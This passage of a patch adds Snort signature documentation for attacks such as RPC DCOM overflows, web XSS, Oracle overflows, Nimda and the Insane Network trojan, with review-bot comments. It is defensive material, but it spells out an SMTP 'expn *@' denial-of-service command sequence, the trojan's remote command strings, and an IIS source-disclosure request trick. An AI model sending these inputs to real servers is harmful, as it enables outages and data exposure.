+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
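Review bot: Detailed Information never says which request the rule matches; the text is the generic "gain unauthorized access to a CGI application" boilerplate that also appears unchanged in 1565.txt, so an analyst who sees SID 1877 learns nothing about what was requested. Add the script or URI pattern the rule looks for and the product it belongs to, and replace "All systems running CGI applications" with the actual affected software. "ona" is a typo for "on a", and the line beginning "relationships between the victim server" runs well past the wrapping width used in the rest of the file.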
--- /dev/null
+++ b/doc/signatures/1565.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1565
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
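Review bot: identical to 1877.txt except for the Sid, so the same problems apply (no named script, "ona" typo, overlong line); in particular, state here what SID 1565 matches that SID 1877 does not, otherwise the two documents are interchangeable and neither helps with triage.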
--- /dev/null
+++ b/doc/signatures/3275.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3275
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
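Review bot: fourth verbatim copy of the DCOM text in this patch (3397, 3387, 3280, 3275), with the same "Expoit" typo and the same unexplained difference between the Attack Scenarios trigger (overly long filename over a network share) and the Detailed Information trigger (malformed RPC request); add the SID-specific detail here rather than another copy.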
--- /dev/null
+++ b/doc/signatures/100000797.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000797
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Pivot" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "c2" parameter in the "blogroll.php" script used by the "Pivot" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Pivot
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
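Review bot: two blank lines precede "Rule:" and the Sid, Affected Systems and Contributors blocks have no blank line before their separators, unlike most files in this patch. As with the other cross site scripting entries, Impact ("system integrity compromise", "execution of arbitrary code") and the second Detailed Information paragraph are remote-include boilerplate that does not describe what a reflected script injection through the "c2" parameter of blogroll.php can do; describe the browser-side impact and add to Corrective Action that the application must encode "c2" before placing it in the page. "All systems running CGI applications using Pivot" should name Pivot and its affected versions.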
--- /dev/null
+++ b/doc/signatures/2449.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2449
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow vulnerability associated with Ipswitch WS FTP ALLO command.
+
+--
+Impact:
+Remote access.  A successful attack may permit the remote execution of 
+arbitrary commands with system privileges. A Denial of Service (DoS)
+attack may also be possible.
+
+--
+Detailed Information:
+Ipswitch WS FTP is an FTP server. A vulnerability exists with the ALLO 
+command that can cause a buffer overflow and permit the execution of 
+arbitrary commands with system privileges. The buffer overflow can be 
+caused by supplying an overly long argument to the ALLO command.
+
+--
+Affected Systems:
+	Ipswitch WS FTP Server 1.0.1 through 1.0.5, 2.0 through 2.0.4, 
+	3.0 1, 3.0, 3.1, 3.1.1, 3.1.2, 3.1.3, 3.4, 4.0 2, 4.0 1 and 4.0
+	Ipswitch WS_FTP Pro 6.0, 7.5, 8.0 3, 8.0 2
+
+--
+Attack Scenarios:
+An attacker can use one of the publicly available exploit scripts to
+cause the overflow to occur.
+
+--
+Ease of Attack:
+Simple.  Many exploits exist.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Use scp as an alternative to ftp
+
+Disallow ftp access to internal resources from external sources
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
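Review bot: the Affected Systems version strings "3.0 1", "4.0 2", "4.0 1", "8.0 3" and "8.0 2" look like dotted versions that lost their last separator (3.0.1, 4.0.2 and so on); check them against the vendor advisory and cite it in Additional References, which is empty even though Ease of Attack says "Many exploits exist." The product is written "Ipswitch WS FTP" in the Summary and first list item but "WS_FTP Pro" in the second; use one spelling. "Use scp as an alternative to ftp" is odd advice for a Windows FTP server product; "use SFTP or FTPS instead of plain FTP" is the generally applicable form. False Positives should also say what argument length the rule treats as an overflow, since clients legitimately send ALLO with a file size.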
--- /dev/null
+++ b/doc/signatures/2617.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2617
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "alter_mview_propagation" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gname" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck632.html
+
+--
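Review bot: same structure and the same misplaced Snort note as 2646.txt ("make sure that the variable $ORACLE_PORTS is set to a value of "any"" belongs in False Negatives, with the reason it is needed on Windows). Beyond that, Attack Scenarios says the overflow is triggered by a long string in "gname" but nowhere is the threshold length given, so a reader cannot tell a long but legitimate group name from the event condition; state the length the rule checks for. "a Oracle" should be "an Oracle", and the Affected Systems indentation uses spaces rather than the tab used elsewhere.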
--- /dev/null
+++ b/doc/signatures/1295.txt
@@ -0,0 +1,70 @@
+Rule: 
+
+--
+Sid:
+1295 
+
+--
+Summary: 
+This event is generated when traffic containing the RICHED20.DLL file is
+detected. This may indicate Nimda worm activity.
+
+--
+Impact:
+Possible infection by the Nimda virus.
+
+--
+Detailed Information:
+Nimda spreads by file infection, mass emailer, file share, or IIS unicode exploit 
+to attack unpatched systems.
+
+--
+Affected Systems:
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows 2000
+
+--
+Attack Scenarios:
+An unpatched server is connected to the internet and is infected or
+an infected email is opened. Once infected the worm spreads itself.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+Application/User may access the Microsoft RichEdit control across the 
+network causing a false positive.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Check the suspect host for signs of infection. Apply patches 
+or upgrade the operating system
+
+--
+Contributors:
+Snort documentation contributed by Timothy Vienneau
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/topics/virus/nimda.asp
+
+F-Secure:
+http://www.f-secure.com/v-descs/nimda.shtml
+
+Microsoft:
+http://msdn.microsoft.com/library/en-us/vclib/html/vclrfafxinitrichedit2.asp
+
+--
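Review bot: the separator on the line before "Additional References:" is "-- " with a trailing space, and "Rule: ", the Sid value "1295 " and "Summary: " also carry trailing whitespace; a tool that splits these files on an exact "--" line will merge the Contributors and Additional References sections, so strip the trailing spaces. Impact calls Nimda a virus while Summary and Attack Scenarios call it a worm; use one term. Windows NT is absent from Affected Systems although Detailed Information names the IIS unicode exploit as a spreading vector, which is worth checking against the referenced Microsoft page.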
--- /dev/null
+++ b/doc/signatures/1404.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1404
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
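Review bot: the Summary and Detailed Information for sid 1404 never say what the rule actually matches; "an attempt is made to exploit a known vulnerability on a web server or a web application" applies to every web signature, so an analyst triaging this alert cannot tell from this file which request pattern fired. Add at least the URI or content string the rule looks for and the product it targets, and populate Additional References (currently empty) with the advisory it was written from. Minor: "attackers choosing" in Impact should be "attacker's choosing".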
--- /dev/null
+++ b/doc/signatures/100000564.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000564
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "GL-SH Deaf Forum" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "search" parameter in the "show.php" script 
+used by the "GL-SH Deaf Forum" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using GL-SH Deaf Forum
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
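Review bot: Impact and the second paragraph of Detailed Information are generic CGI boilerplate ("Possible unauthorized administrative access to the server", "execute system binaries") that does not match the vulnerability described, a cross site scripting flaw in the "search" parameter of "show.php". Reflected XSS runs script in a visiting user's browser, which the Attack Scenarios paragraph already states correctly; rewrite Impact to describe client-side script execution and theft of the user's session data rather than server compromise. Style: the Sid section lacks the blank line before "--" that the other files use, and there is a stray empty line after the final "--".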
--- /dev/null
+++ b/doc/signatures/100000138.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid: 
+100000138
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Microsoft Internet Information Server (IIS).
+
+-- 
+Impact: 
+Serious. Information Disclosure, application source code may be disclosed.
+
+--
+Detailed Information:
+A programming error in an error page for Microsoft IIS may result in the 
+discloure of asp code disclosure on an affected system.
+
+By making a request to a server using a modified SERVER_NAME variable, the 
+underlying asp code is displayed in the error page returned to the requestor if 
+the asp page generates an error.
+
+--
+Affected Systems:
+Microsoft IIS 6.0 and prior
+
+--
+Attack Scenarios: 
+An attacker can make a request to the server and modify the SERVER_NAME 
+variable to be either localhost or 127.0.0.1, if the page returns an error the 
+asp code is revealed.
+
+-- 
+Ease of Attack: 
+Simple. Exploit code exists.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Original Rule writer rmkml <rmkml@free.fr>
+Sourcefire Vulnerability Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
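Review bot: "discloure of asp code disclosure" in Detailed Information is a typo with a doubled word; read "disclosure of ASP source code". The file describes a specific, patched IIS flaw (a modified SERVER_NAME variable causing source disclosure in an error page, "Exploit code exists") yet Additional References is empty; add the vendor bulletin and the Bugtraq or CVE identifier the rule was written from so "Apply the appropriate vendor supplied patch" is actionable. Style: several separators are "-- " with a trailing space and the Sid, Summary and Impact labels carry trailing spaces, unlike the other files.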
--- /dev/null
+++ b/doc/signatures/1450.txt
@@ -0,0 +1,79 @@
+Rule:
+
+--
+Sid:
+
+1450
+
+--
+Summary:
+This event is generated when an attempt is made to send a malformed
+request to an SMTP server which may cause a Denial of Service.
+
+--
+Impact:
+Denial of Service (DoS)
+
+--
+Detailed Information:
+The SMTP standard command "EXPN" is provided by servers to help find
+user e-mail accounts.
+
+A malformed request to certain versions of Vintra MailServer can cause a
+DoS against that server.
+ 
+--
+Affected Systems:
+
+Vixar MailServer for Windows
+
+--
+Attack Scenarios:
+The attacker needs to connect to a vulnerable server and issue the
+following commands.
+
+>telnet victim.foo.com 25
+>helo victim
+>mail from:doctor
+>rcpt to:evil
+>expn *@
+
+--
+Ease of Attack:
+
+Simple. No exploit software required.
+
+--
+False Positives:
+
+None known.
+
+--
+False Negatives:
+
+None known.
+
+--
+Corrective Action:
+
+Disable the EXPN command on the SMTP server.
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Extra information from Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+NT Bugtraq:
+http://marc.theaimsgroup.com/?l=ntbugtraq&m=90222454131610&w=2
+
+Command Reference:
+http://www.ntmail.co.uk/kb.htm?q=980
+
+--
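Review bot: the product name is inconsistent: Detailed Information says "certain versions of Vintra MailServer" while Affected Systems lists "Vixar MailServer for Windows", and the command reference link points at ntmail.co.uk, a third product name. Pick the correct vendor name and use it in both sections, and state the affected version range, since "certain versions" cannot be acted on. Also the Sid section has a blank line between "Sid:" and "1450" that no other file has, and "Upgrade to the latest non-affected version of the software" is missing its full stop.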
--- /dev/null
+++ b/doc/signatures/3016.txt
@@ -0,0 +1,90 @@
+Rule: 
+
+--
+Sid: 
+3016
+-- 
+Summary: 
+This event is generated when an attempt is made to request a connection on port 63536 using the Insane Network 4.0 trojan.
+
+-- 
+
+Impact: 
+If connected, the attacker could remotetly execute a multitude of functions resulting in a full compromise of the victim's machine.
+
+--
+Detailed Information:
+Insane Network 4.0 uses port 2000 as its default, but -2000, or port 63536, incarnations also exist.
+Insane Network 4.0 has a number of functions. The following strings are indicative of a particular Insane Network 4.0 attack.
+Be aware that some versions of Insane Network 4.0 will send their attack strings one letter at a time. For example,
+to send the bomb command, some versions will send only one letter per packet, resulting in bomb being spelled out in multiple packets.
+
+Format: Name of function (Description of what it does *only if necessary*) - string to look for
+
+Bomb ("Bombs" monitor) - bomb
+Snow (Makes monitor snowy) - snow
+Melt ("Melts" the screen) - melt
+Reverse (Reverses screen) - reverse
+Copy File - cp followed by a file name and the destination path
+Ctrl-Alt-Del (Enable/Disable Ctrl-Alt-Del) - cad -e (for enable) cad -d (for disable)
+Delete File - rm followed by a file name, including path
+File List - ls followed by directory
+File Sharing (Gets shared file password information) - share
+Dial-Up Passwords (Get Dial-up password information) - passwd
+Make Text File - mktext
+Popup Message - popup
+Read File - cat followed by a file name, including path
+Reboot - reboot
+Registry Edit - regrun
+Rename File - ren followed by a file and its new name
+Run File - exec followed by a file name, including path
+Shutdown - shutdown
+Taskbar (Enable/Disable Task Bar) - task -e (for enable) tast -d (for disable)
+Telnet - telnet
+
+--
+Affected Systems:
+Windows 95/98/ME/NT/2000
+
+--
+
+Attack Scenarios: 
+The victim must first install the server. Be wary of suspicious files because they often can be backdoors in disguise.
+Once the victim mistakenly installs the server program, the attacker usually will employ an IP scanner program
+to find the IP addresses of victims that have installed the program. Then the attacker enters the IP address, port number (which 
+is assigned to the server program by the attacker: default is 2000), and presses the connect button and he has access to your computer.
+
+-- 
+
+Ease of Attack: 
+Easy. Simply a matter of pressing the connect button once the victim has installed the server.
+
+
+-- 
+
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+-- 
+
+Corrective Action: 
+Remove insane network.exe and commands.txt
+Kill insane network.exe in the process list
+
+Keep your anti-virus software updated with the latest virus definitions.
+
+--
+Contributors:
+Original Rule Writer: Ricky Macatee <rmacatee@sourcefire.com> 
+Sourcefire Research Team
+
+-- 
+Additional References:
+http://www.pestpatrol.com/PestInfo/i/insane_network.asp
+
+
+--
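Review bot: "tast -d (for disable)" in the Taskbar line of the command list looks like a typo for "task -d", matching the "task -e (for enable)" beside it; since this list is presented as the strings to look for in traffic, each string must be exact. Other fixes: "remotetly" in Impact; "uses port 2000 as its default, but -2000, or port 63536" would be clearer as "65536 - 2000 = 63536", which is why the Summary names 63536; and Attack Scenarios switches to second person ("he has access to your computer") where the other files stay impersonal. Corrective Action names "insane network.exe" with a space in the file name; confirm that is the real file name and quote it so the space is not read as two words.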
--- /dev/null
+++ b/doc/signatures/2989.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+2989
+
+--
+Summary:
+This event is generated when an attempt is made to bind to the Windows
+registry service via SMB. 
+
+--
+Impact:
+Serious. Remote administration of the Windows reqistry may be possible.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to bind to the Windows
+registry service via SMB across the network.
+
+It may be possible for an attacker to manipulate the Windows registry
+from a remote location. This could give the attacker administrative
+privileges on the target host as well as the opportunity to execute code
+of their choosing.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+If the Windows registry is accessible via SMB the attacker can
+manipulate the operating system registry settings.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
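Review bot: False Positives "None known." is at odds with Impact, which itself frames binding to the registry service over SMB as "Remote administration of the Windows registry"; any legitimate administrative host or management tool that uses the remote registry service will fire this rule, and the file should say so and advise tuning on source address. Typos: "reqistry" in Impact, and "None Known." under False Negatives is capitalised differently from "None known." under False Positives. Additional References is empty.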
--- /dev/null
+++ b/doc/signatures/1848.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1848
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
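Review bot: apart from the Sid, this file is a word-for-word copy of 1404.txt; two different rules documented with identical generic text ("Many known vulnerabilities exist for each implementation and the attack scenarios are legion") give an analyst no way to tell what sid 1848 detects versus sid 1404. Each file should name the request pattern or product its rule matches and cite its own advisory under Additional References, which is empty here as well.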
--- /dev/null
+++ b/doc/signatures/3224.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3224
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
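Review bot: Attack Scenarios ("a request for a file with an overly long filename via a network share") does not follow from Detailed Information, which describes malformed data sent via RPC to DCOM; if the long-filename request is the specific trigger for this rule, Detailed Information should say so, otherwise the scenario reads as copied from another rule. Additional References is empty although Corrective Action tells the reader to "Apply the appropriate vendor supplied patches"; cite the Microsoft security bulletin and CVE for this RPC DCOM flaw so the patch can be identified. Typo: "Expoit code exists".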
--- /dev/null
+++ b/doc/signatures/2755.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2755
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_unique_resolution
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
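Review bot: a stray line break in Detailed Information splits a sentence, leaving ". This procedure is included in" at the start of a line; join it as "...in the procedure comment_on_unique_resolution. This procedure is included in dbms_repcat." Affected Systems reads "Oracle Oracle9i" (doubled vendor name). Additional References is empty even though "Apply the appropriate vendor supplied patch" presumes a known advisory; add the Oracle alert or CVE this rule was written from.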
--- /dev/null
+++ b/doc/signatures/523.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid: 523
+
+--
+Summary:
+This event is generated when packets on the network have the reserved 
+bit set.
+
+--
+Impact:
+Possible prelude to system compromise.
+
+--
+Detailed Information:
+Under normal circumstances IP packets do not use the reserved bit.
+
+This may be an indicator of the use of the reserved bit by a malicious 
+user to instigate covert channel communications.
+
+an indicator of unauthorized network use, reconnaisance activity or 
+system compromise. These rules may also generate an event due to 
+improperly configured network devices.
+
+--
+Affected Systems:
+	All
+
+--
+Attack Scenarios:
+The attacker may send specially crafted packets with the reserved bit 
+set.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Use a packet filtering device to reject packets with this bit set.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
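Review bot: the third paragraph of Detailed Information begins mid-sentence ("an indicator of unauthorized network use, reconnaisance activity or system compromise."), so its subject has been lost; it should read along the lines of "This may also be an indicator of...". The same paragraph states "These rules may also generate an event due to improperly configured network devices", which contradicts False Positives "None Known"; move the misconfigured-device case into False Positives. Typo: "reconnaisance". Style: "Sid: 523" is on one line whereas the other files put the number on the following line.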
--- /dev/null
+++ b/doc/signatures/269.txt
@@ -0,0 +1,75 @@
+Rule:
+--
+Sid:
+269
+
+--
+Summary:
+A denial of service attack known as Land has been launched. Some TCP/IP 
+stacks crash or hang when sent a spoofed TCP SYN packet with the same 
+source and destination host and the same source and destination port.  
+
+--
+Impact:
+Denial of service against a target host.
+
+--
+Detailed Information:
